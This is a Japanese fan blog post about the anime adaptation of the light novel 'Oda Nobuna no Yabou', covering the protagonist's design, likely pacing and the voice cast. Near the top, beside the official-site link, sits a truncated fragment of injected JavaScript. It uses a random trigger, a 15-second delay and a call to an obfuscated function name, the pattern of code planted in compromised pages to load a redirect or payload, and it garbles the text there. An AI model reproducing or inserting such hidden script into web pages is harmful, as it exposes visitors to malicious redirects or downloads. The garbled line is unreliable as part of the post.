織田信奈の野望のアニメ化について

公式サイト

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://odanobuna.com/

主人公(相良良晴)のキャラデザをみて嫌な予感が止まらない。

そして、キャストをみてさらに不安が募る。

相良良晴がなぜかイケメンっぽい。もっとさるっぽいというかダサい感じでいいと思うけどな。

キャストに竹中半兵衛がいるってことは、そこまでは話をすると思われる。

2クールなのかな?

さすがに原作2巻を消化するのに1クールだと今川のところが2話くらいで終わりそう。

とりあえず、ストーリーはしょりすぎて、あっというまに竹中登場とかならなければいいな。

お願いだから、なんだ、面白いじゃん。

不安になってばかだったとか、思わせて欲しい。

ラノベ原作は本当にハズレが多いから悲しい。。。

とくに今回アニメ化される「織田信奈の野望」は原作がすごくお気に入りで、続きが出たら絶対買うシリーズに

なっているくらい。

最新刊の続きはまだか!!

そういえば、キャストでは竹中半兵衛のCVが小倉唯ということで

病弱キャラきましたね。

咲でも、トキ役で絶好調だし、病弱キャラはあってると思えますね。

蜂須賀五右衛門のCVは金田朋子!!

壮絶なかみかみ台詞に期待。というか、きかなくても脳内再生できそうなきがする。

今川義元のCVは能登麻美子

ぽわぽわしてるけど、ちょっと普段の能登さんとの声とちょっとイメージ違うから

ちょっと強目にしたりするのかな。

コメントを残す